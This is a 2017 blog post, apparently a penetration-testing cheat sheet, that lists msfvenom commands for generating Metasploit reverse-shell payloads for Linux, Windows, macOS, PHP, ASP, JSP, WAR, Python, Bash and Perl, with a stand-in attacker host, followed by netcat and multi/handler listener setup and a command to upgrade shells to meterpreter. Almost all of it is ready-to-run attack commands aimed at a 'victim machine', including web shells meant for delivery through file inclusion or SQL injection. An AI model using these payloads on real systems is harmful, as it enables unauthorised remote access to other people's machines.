Sunday, 9 April 2017

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Below are the different types of Metasploit payloads we can use to get a reverse shell from the victim machine.

These payloads are used in Metasploit with set payload "payloadname"; before that we have to set up the multi handler, which is configured with use exploit/multi/handler.

The payloads mentioned require certain options as input, such as LHOST and LPORT.


Operating System Based Binary Shells


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection


PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.php

Open the shell.php file in a text editor and remove the "#" that will be present at the start of this file.

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f war > shell.war

Script Based Payloads:

Python

msfvenom -p cmd/unix/reverse_python LHOST=attackerip LPORT=attackerport -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=attackerport -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=attackerip LPORT=attackerport -f raw > shell.pl

Shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Simple TCP Reverse Shell

Windows

windows/shell_reverse_tcp
windows/x86/shell_reverse_tcp

Linux

linux/shell_reverse_tcp

Mac

osx/x64/shell_reverse_tcp
osx/x86/shell_reverse_tcp

Handling The Reverse/Bind Connection

You can handle these reverse connections using Netcat or the Metasploit Multi Handler module.

Netcat : Use this command on your attacking machine : nc -nlvp <attackerport>

Metasploit : In Metasploit, follow the steps below to handle these reverse connections

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit (This will present the reverse shell as soon as the payload is executed)
exploit -j (This will background the shell immediately after receiving the reverse shell)

Note - Sometimes you will not get the meterpreter reverse shell, or the shell will die immediately, for various reasons. In this case you can first try the simple Windows shell (shell_reverse_tcp):

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit -j (This will background the shell immediately after receiving the reverse shell. Once it is backgrounded you can interact with it using the command sessions -i <sessionnumber>)

Now use this command to upgrade the simple reverse TCP shell into a meterpreter reverse shell:

sessions -u <numberofsession>
